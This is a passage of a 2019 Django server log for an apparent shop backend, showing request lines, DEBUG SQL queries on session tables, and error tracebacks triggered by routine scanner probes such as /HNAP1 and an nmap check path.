'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 13, 2, 46, 29, 93397, tzinfo=)) [29/Nov/2019 02:46:29] "GET /login/?next=/ HTTP/1.0" 200 1786 [29/Nov/2019 02:48:07] "GET / HTTP/1.0" 302 0 DEBUG 2019-11-29 02:48:08,036 utils 18694 139696059688704 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'ygxke0fl2ldfbstx6j7erb8yjvuqtu8h' LIMIT 1; args=('ygxke0fl2ldfbstx6j7erb8yjvuqtu8h',) DEBUG 2019-11-29 02:48:08,037 utils 18694 139696059688704 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('ygxke0fl2ldfbstx6j7erb8yjvuqtu8h', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-13T02:48:08.036827+00:00'::timestamptz); args=('ygxke0fl2ldfbstx6j7erb8yjvuqtu8h', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 13, 2, 48, 8, 36827, tzinfo=)) [29/Nov/2019 02:48:08] "GET /login/?next=/ HTTP/1.0" 200 1786 [29/Nov/2019 02:49:36] "GET / HTTP/1.0" 302 0 [29/Nov/2019 02:54:43] "GET / HTTP/1.0" 302 0 [29/Nov/2019 02:59:47] "GET / HTTP/1.0" 302 0 [29/Nov/2019 03:00:01] "GET /whm-server-status HTTP/1.0" 301 0 [29/Nov/2019 03:04:51] "GET / HTTP/1.0" 302 0 [29/Nov/2019 03:08:56] "GET / HTTP/1.0" 302 0 [29/Nov/2019 03:09:58] "GET / HTTP/1.0" 302 0 [29/Nov/2019 03:15:05] "GET / HTTP/1.0" 302 0 [29/Nov/2019 03:20:10] "GET / HTTP/1.0" 302 0 [29/Nov/2019 03:25:13] "GET / HTTP/1.0" 302 0 [29/Nov/2019 03:30:20] "GET / HTTP/1.0" 302 0 [29/Nov/2019 03:35:28] "GET / HTTP/1.0" 302 0 [29/Nov/2019 03:40:35] "GET / HTTP/1.0" 302 0 [29/Nov/2019 03:45:37] "GET / HTTP/1.0" 302 0 [29/Nov/2019 03:50:47] "GET / HTTP/1.0" 302 0 [29/Nov/2019 03:55:55] "GET / HTTP/1.0" 302 0 [29/Nov/2019 04:01:01] "GET / HTTP/1.0" 302 0 [29/Nov/2019 04:06:05] "GET / HTTP/1.0" 302 0 [29/Nov/2019 04:11:14] "GET / HTTP/1.0" 302 0 [29/Nov/2019 04:14:56] "GET / HTTP/1.0" 302 0 [29/Nov/2019 04:16:18] "GET / HTTP/1.0" 302 0 [29/Nov/2019 04:21:27] "GET / HTTP/1.0" 302 0 [29/Nov/2019 04:26:32] "GET / HTTP/1.0" 302 0 [29/Nov/2019 04:31:40] "GET / HTTP/1.0" 302 0 [29/Nov/2019 04:36:47] "GET / HTTP/1.0" 302 0 [29/Nov/2019 04:41:53] "GET / HTTP/1.0" 302 0 [29/Nov/2019 04:46:59] "GET / HTTP/1.0" 302 0 [29/Nov/2019 04:52:06] "GET / HTTP/1.0" 302 0 [29/Nov/2019 04:54:56] "GET / HTTP/1.0" 302 0 [29/Nov/2019 04:57:09] "GET / HTTP/1.0" 302 0 [29/Nov/2019 05:01:00] "GET / HTTP/1.0" 302 0 DEBUG 2019-11-29 05:01:01,311 utils 18694 139696059688704 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '9hn142l0zivfoguo85mh9px3b8urpsgg' LIMIT 1; args=('9hn142l0zivfoguo85mh9px3b8urpsgg',) DEBUG 2019-11-29 05:01:01,313 utils 18694 139696059688704 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('9hn142l0zivfoguo85mh9px3b8urpsgg', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-13T05:01:01.311781+00:00'::timestamptz); args=('9hn142l0zivfoguo85mh9px3b8urpsgg', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 13, 5, 1, 1, 311781, tzinfo=)) [29/Nov/2019 05:01:01] "GET /login/?next=/ HTTP/1.0" 200 1786 [29/Nov/2019 05:01:01] "GET /static/admin/css/base.css HTTP/1.0" 200 16378 [29/Nov/2019 05:01:01] "GET /static/admin/css/login.css HTTP/1.0" 200 1233 [29/Nov/2019 05:01:02] "GET /static/admin/css/responsive.css HTTP/1.0" 200 17944 [29/Nov/2019 05:01:02] "GET /static/admin/css/fonts.css HTTP/1.0" 200 423 [29/Nov/2019 05:01:03] "GET /static/admin/fonts/Roboto-Regular-webfont.woff HTTP/1.0" 200 85876 [29/Nov/2019 05:01:03] "GET /static/admin/fonts/Roboto-Light-webfont.woff HTTP/1.0" 200 85692 Not Found: /favicon.ico [29/Nov/2019 05:01:03] "GET /favicon.ico HTTP/1.0" 404 6411 [29/Nov/2019 05:02:11] "GET / HTTP/1.0" 302 0 [29/Nov/2019 05:07:21] "GET / HTTP/1.0" 302 0 [29/Nov/2019 05:12:28] "GET / HTTP/1.0" 302 0 [29/Nov/2019 05:17:33] "GET / HTTP/1.0" 302 0 [29/Nov/2019 05:22:39] "GET / HTTP/1.0" 302 0 [29/Nov/2019 05:27:46] "GET / HTTP/1.0" 302 0 [29/Nov/2019 05:32:50] "GET / HTTP/1.0" 302 0 [29/Nov/2019 05:37:55] "GET / HTTP/1.0" 302 0 [29/Nov/2019 05:43:01] "GET / HTTP/1.0" 302 0 [29/Nov/2019 05:46:28] "GET / HTTP/1.0" 302 0 DEBUG 2019-11-29 05:46:29,127 utils 18694 139696074503936 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'hrjd5eme7tgbouy3ayk5nebq1r2czf8k' LIMIT 1; args=('hrjd5eme7tgbouy3ayk5nebq1r2czf8k',) DEBUG 2019-11-29 05:46:29,129 utils 18694 139696074503936 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('hrjd5eme7tgbouy3ayk5nebq1r2czf8k', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-13T05:46:29.128209+00:00'::timestamptz); args=('hrjd5eme7tgbouy3ayk5nebq1r2czf8k', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 13, 5, 46, 29, 128209, tzinfo=)) [29/Nov/2019 05:46:29] "GET /login/?next=/ HTTP/1.0" 200 1786 [29/Nov/2019 05:48:03] "GET / HTTP/1.0" 302 0 [29/Nov/2019 05:53:10] "GET / HTTP/1.0" 302 0 [29/Nov/2019 05:58:17] "GET / HTTP/1.0" 302 0 [29/Nov/2019 06:03:22] "GET / HTTP/1.0" 302 0 [29/Nov/2019 06:08:28] "GET / HTTP/1.0" 302 0 [29/Nov/2019 06:13:32] "GET / HTTP/1.0" 302 0 [29/Nov/2019 06:18:36] "GET / HTTP/1.0" 302 0 [29/Nov/2019 06:23:41] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [29/Nov/2019 06:23:53] "GET /robots.txt HTTP/1.0" 404 6408 DEBUG 2019-11-29 06:23:56,678 utils 18694 139696074503936 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-29T06:23:56.668896+00:00'::timestamptz AND "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'); args=(datetime.datetime(2019, 11, 29, 6, 23, 56, 668896, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') [29/Nov/2019 06:23:56] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [29/Nov/2019 06:23:56] "GET /robots.txt HTTP/1.0" 404 6408 DEBUG 2019-11-29 06:23:56,930 utils 18694 139696074503936 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-29T06:23:56.921801+00:00'::timestamptz AND "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'); args=(datetime.datetime(2019, 11, 29, 6, 23, 56, 921801, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') DEBUG 2019-11-29 06:23:56,956 utils 18694 139696074503936 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-13T06:23:56.954635+00:00'::timestamptz WHERE "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 13, 6, 23, 56, 954635, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') [29/Nov/2019 06:23:56] "GET /login/?next=/ HTTP/1.0" 200 1786 [29/Nov/2019 06:28:47] "GET / HTTP/1.0" 302 0 [29/Nov/2019 06:33:54] "GET / HTTP/1.0" 302 0 [29/Nov/2019 06:38:56] "GET / HTTP/1.0" 302 0 [29/Nov/2019 06:44:05] "GET / HTTP/1.0" 302 0 [29/Nov/2019 06:44:50] "GET / HTTP/1.0" 302 0 [29/Nov/2019 06:45:00] "GET / HTTP/1.0" 302 0 [29/Nov/2019 06:45:00] "GET /nmaplowercheck1575009900 HTTP/1.0" 301 0 [29/Nov/2019 06:45:00] "GET / HTTP/1.0" 302 0 Internal Server Error: /sdk Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/deprecation.py", line 93, in __call__ response = self.process_request(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 53, in process_request path = self.get_full_path_with_slash(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 93, in get_full_path_with_slash 'url': request.get_host() + new_path, RuntimeError: You called this URL via POST, but the URL doesn't end in a slash and you have APPEND_SLASH set. Django can't redirect to the slash URL while maintaining POST data. Change your form to point to 70.32.81.181/sdk/ (note the trailing slash), or set APPEND_SLASH=False in your Django settings. [29/Nov/2019 06:45:00] "POST /sdk HTTP/1.0" 500 64584 Not Found: /evox/about [29/Nov/2019 06:45:01] "GET /evox/about HTTP/1.0" 404 6405 [29/Nov/2019 06:45:01] "GET /HNAP1 HTTP/1.0" 301 0 DEBUG 2019-11-29 06:45:01,932 utils 18694 139696059688704 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" WHERE "shop_category"."slug" = 'HNAP1'; args=('HNAP1',) DEBUG 2019-11-29 06:45:01,971 utils 18694 139696059688704 (0.001) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE "shop_product"."available" = true ORDER BY "shop_product"."name" ASC LIMIT 21; args=(True,) DEBUG 2019-11-29 06:45:01,973 utils 18694 139696059688704 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-29 06:45:01,975 utils 18694 139696059688704 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-29 06:45:01,977 utils 18694 139696059688704 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" WHERE "shop_category"."slug" = 'HNAP1' LIMIT 21; args=('HNAP1',) DEBUG 2019-11-29 06:45:01,979 utils 18694 139696059688704 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-29 06:45:01,981 utils 18694 139696059688704 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" WHERE "shop_category"."slug" = 'HNAP1' LIMIT 21; args=('HNAP1',) DEBUG 2019-11-29 06:45:01,982 utils 18694 139696059688704 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" WHERE "shop_category"."slug" = 'HNAP1' LIMIT 21; args=('HNAP1',) DEBUG 2019-11-29 06:45:01,983 utils 18694 139696059688704 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" WHERE "shop_category"."slug" = 'HNAP1' LIMIT 21; args=('HNAP1',) Internal Server Error: /HNAP1/ Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) psycopg2.errors.UndefinedTable: relation "shop_category" does not exist LINE 1: ...hop_category"."name", "shop_category"."slug" FROM "shop_cate... ^ The above exception was the direct cause of the following exception: Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/base.py", line 115, in _get_response response = self.process_exception_by_middleware(e, request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/base.py", line 113, in _get_response response = wrapped_callback(request, *callback_args, **callback_kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/shop/views.py", line 12, in product_list category = get_object_or_404(Category, slug=category_slug) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/shortcuts.py", line 93, in get_object_or_404 return queryset.get(*args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 402, in get num = len(clone) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 256, in __len__ self._fetch_all() File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 1242, in _fetch_all self._result_cache = list(self._iterable_class(self)) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 55, in __iter__ results = compiler.execute_sql(chunked_fetch=self.chunked_fetch, chunk_size=self.chunk_size) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1100, in execute_sql cursor.execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 99, in execute return super().execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 67, in execute return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 76, in _execute_with_wrappers return executor(sql, params, many, context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/utils.py", line 89, in __exit__ raise dj_exc_value.with_traceback(traceback) from exc_value File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) django.db.utils.ProgrammingError: relation "shop_category" does not exist LINE 1: ...hop_category"."name", "shop_category"."slug" FROM "shop_cate... ^ [29/Nov/2019 06:45:02] "GET /HNAP1/ HTTP/1.0" 500 131130 [29/Nov/2019 06:49:10] "GET / HTTP/1.0" 302 0 [29/Nov/2019 06:54:17] "GET / HTTP/1.0" 302 0 [29/Nov/2019 06:59:23] "GET / HTTP/1.0" 302 0 [29/Nov/2019 07:00:02] "GET /whm-server-status HTTP/1.0" 301 0 [29/Nov/2019 07:02:28] "OPTIONS /api/register HTTP/1.0" 200 187 [29/Nov/2019 07:04:29] "GET / HTTP/1.0" 302 0 [29/Nov/2019 07:06:06] "OPTIONS /api/register HTTP/1.0" 200 187 [29/Nov/2019 07:09:34] "GET / HTTP/1.0" 302 0 [29/Nov/2019 07:12:46] "OPTIONS /api/register HTTP/1.0" 200 187 [29/Nov/2019 07:14:41] "GET / HTTP/1.0" 302 0 DEBUG 2019-11-29 07:14:55,416 utils 18694 139696059688704 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-29T07:14:55.401769+00:00'::timestamptz AND "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'); args=(datetime.datetime(2019, 11, 29, 7, 14, 55, 401769, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') [29/Nov/2019 07:14:55] "GET / HTTP/1.0" 302 0 DEBUG 2019-11-29 07:14:55,674 utils 18694 139696059688704 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-29T07:14:55.662602+00:00'::timestamptz AND "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'); args=(datetime.datetime(2019, 11, 29, 7, 14, 55, 662602, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') DEBUG 2019-11-29 07:14:55,701 utils 18694 139696059688704 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-13T07:14:55.699629+00:00'::timestamptz WHERE "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 13, 7, 14, 55, 699629, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') [29/Nov/2019 07:14:55] "GET /login/?next=/ HTTP/1.0" 200 1786 [29/Nov/2019 07:14:55] "GET /static/admin/css/base.css HTTP/1.0" 304 0 [29/Nov/2019 07:14:55] "GET /static/admin/css/login.css HTTP/1.0" 304 0 Not Found: /robots.txt [29/Nov/2019 07:14:56] "GET /robots.txt HTTP/1.0" 404 6408 [29/Nov/2019 07:14:56] "GET /static/admin/css/responsive.css HTTP/1.0" 304 0 DEBUG 2019-11-29 07:14:56,373 utils 18694 139696059688704 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-29T07:14:56.364365+00:00'::timestamptz AND "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'); args=(datetime.datetime(2019, 11, 29, 7, 14, 56, 364365, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') [29/Nov/2019 07:14:56] "GET / HTTP/1.0" 302 0 DEBUG 2019-11-29 07:14:56,669 utils 18694 139696059688704 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-29T07:14:56.657264+00:00'::timestamptz AND "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'); args=(datetime.datetime(2019, 11, 29, 7, 14, 56, 657264, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') DEBUG 2019-11-29 07:14:56,697 utils 18694 139696059688704 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-13T07:14:56.695591+00:00'::timestamptz WHERE "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 13, 7, 14, 56, 695591, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') [29/Nov/2019 07:14:56] "GET /login/?next=/ HTTP/1.0" 200 1786 [29/Nov/2019 07:14:57] "GET /static/admin/css/fonts.css HTTP/1.0" 304 0 [29/Nov/2019 07:14:57] "GET /static/admin/fonts/Roboto-Light-webfont.woff HTTP/1.0" 304 0 [29/Nov/2019 07:14:57] "GET /static/admin/fonts/Roboto-Regular-webfont.woff HTTP/1.0" 304 0 [29/Nov/2019 07:19:46] "GET / HTTP/1.0" 302 0 [29/Nov/2019 07:24:51] "GET / HTTP/1.0" 302 0 [29/Nov/2019 07:29:56] "GET / HTTP/1.0" 302 0 DEBUG 2019-11-29 07:33:47,442 utils 18694 139696059688704 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-29T07:33:47.433681+00:00'::timestamptz AND "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'); args=(datetime.datetime(2019, 11, 29, 7, 33, 47, 433681, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') DEBUG 2019-11-29 07:33:47,476 utils 18694 139696059688704 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-13T07:33:47.474233+00:00'::timestamptz WHERE "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 13, 7, 33, 47, 474233, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') Method Not Allowed: /api/register [29/Nov/2019 07:33:47] "GET /api/register HTTP/1.0" 405 5703 [29/Nov/2019 07:33:47] "GET /static/rest_framework/css/prettify.css HTTP/1.0" 304 0 [29/Nov/2019 07:33:47] "GET /static/rest_framework/css/bootstrap.min.css HTTP/1.0" 304 0 [29/Nov/2019 07:33:47] "GET /static/rest_framework/css/bootstrap-tweaks.css HTTP/1.0" 304 0 [29/Nov/2019 07:33:48] "GET /static/rest_framework/js/csrf.js HTTP/1.0" 304 0 [29/Nov/2019 07:33:48] "GET /static/rest_framework/js/ajax-form.js HTTP/1.0" 304 0 [29/Nov/2019 07:33:48] "GET /static/rest_framework/css/default.css HTTP/1.0" 304 0 [29/Nov/2019 07:33:48] "GET /static/rest_framework/js/jquery-3.4.1.min.js HTTP/1.0" 304 0 [29/Nov/2019 07:33:48] "GET /static/rest_framework/js/bootstrap.min.js HTTP/1.0" 304 0 [29/Nov/2019 07:33:48] "GET /static/rest_framework/js/prettify-min.js HTTP/1.0" 304 0 [29/Nov/2019 07:33:48] "GET /static/rest_framework/js/default.js HTTP/1.0" 304 0 [29/Nov/2019 07:33:48] "GET /static/rest_framework/img/grid.png HTTP/1.0" 304 0 DEBUG 2019-11-29 07:34:24,557 utils 18694 139696059688704 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-29T07:34:24.544105+00:00'::timestamptz AND "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'); args=(datetime.datetime(2019, 11, 29, 7, 34, 24, 544105, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') DEBUG 2019-11-29 07:34:24,610 utils 18694 139696059688704 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-13T07:34:24.607599+00:00'::timestamptz WHERE "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 13, 7, 34, 24, 607599, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') [29/Nov/2019 07:34:24] "OPTIONS /api/register HTTP/1.0" 200 5991 [29/Nov/2019 07:35:03] "GET / HTTP/1.0" 302 0 DEBUG 2019-11-29 07:35:21,852 utils 18694 139696059688704 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-29T07:35:21.843910+00:00'::timestamptz AND "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'); args=(datetime.datetime(2019, 11, 29, 7, 35, 21, 843910, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') DEBUG 2019-11-29 07:35:21,889 utils 18694 139696059688704 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-13T07:35:21.886761+00:00'::timestamptz WHERE "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 13, 7, 35, 21, 886761, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') [29/Nov/2019 07:35:21] "GET /login/?next=/ HTTP/1.0" 200 1786 Not Found: /favicon.ico [29/Nov/2019 07:35:22] "GET /favicon.ico HTTP/1.0" 404 6411 DEBUG 2019-11-29 07:35:22,857 utils 18694 139696059688704 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-29T07:35:22.848437+00:00'::timestamptz AND "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'); args=(datetime.datetime(2019, 11, 29, 7, 35, 22, 848437, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') DEBUG 2019-11-29 07:35:22,883 utils 18694 139696059688704 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-13T07:35:22.881597+00:00'::timestamptz WHERE "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 13, 7, 35, 22, 881597, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') [29/Nov/2019 07:35:22] "GET /login/?next=/ HTTP/1.0" 200 1786 DEBUG 2019-11-29 07:35:23,730 utils 18694 139696059688704 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-29T07:35:23.721746+00:00'::timestamptz AND "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'); args=(datetime.datetime(2019, 11, 29, 7, 35, 23, 721746, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') DEBUG 2019-11-29 07:35:23,754 utils 18694 139696059688704 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-13T07:35:23.752757+00:00'::timestamptz WHERE "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 13, 7, 35, 23, 752757, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') [29/Nov/2019 07:35:23] "GET /login/?next=/ HTTP/1.0" 200 1786 DEBUG 2019-11-29 07:35:24,094 utils 18694 139696059688704 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-29T07:35:24.085941+00:00'::timestamptz AND "django_session"."session_key" = 